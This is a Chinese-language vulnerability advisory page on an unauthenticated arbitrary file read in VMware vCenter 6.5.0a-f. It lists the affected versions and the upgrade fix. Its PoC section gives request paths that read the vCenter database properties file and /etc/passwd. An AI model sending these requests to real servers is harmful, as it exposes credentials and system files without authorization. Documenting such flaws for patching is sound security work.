VMware vCenter任意文件讀取漏洞


VMware vCenter任意文件讀取漏洞

一、漏洞描述

VMware vCenter 服務器是一種高級服務器管理軟件,提供一個用於控制 VMware vSphere 環境的集中式平台,幫助用戶獲取集中式可見性、簡單高效的規模化管理,從而在整個混合雲中自動部署和交付虛擬基礎架構。

VMware vCenter特定版本存在任意文件讀取漏洞。未經身份驗證的攻擊者可通過向目標系統發送特制請求包來利用此漏洞,成功利用此漏洞的遠程攻擊者可在目標系統讀取任意文件。

二、漏洞影響版本

已知影響版本 VMware vCenter 6.5.0a-f

安全版本 VMware vCenter 6.5u1

三、漏洞復現

poc:

#windows
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
#linux
/eam/vib?id=/etc/passwd

四、漏洞修復

升級至6.5u1修復版本。

 

-----------------------------------------------------------------------------------------------------------

參考:https://www.jianshu.com/p/cdcec329be28


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM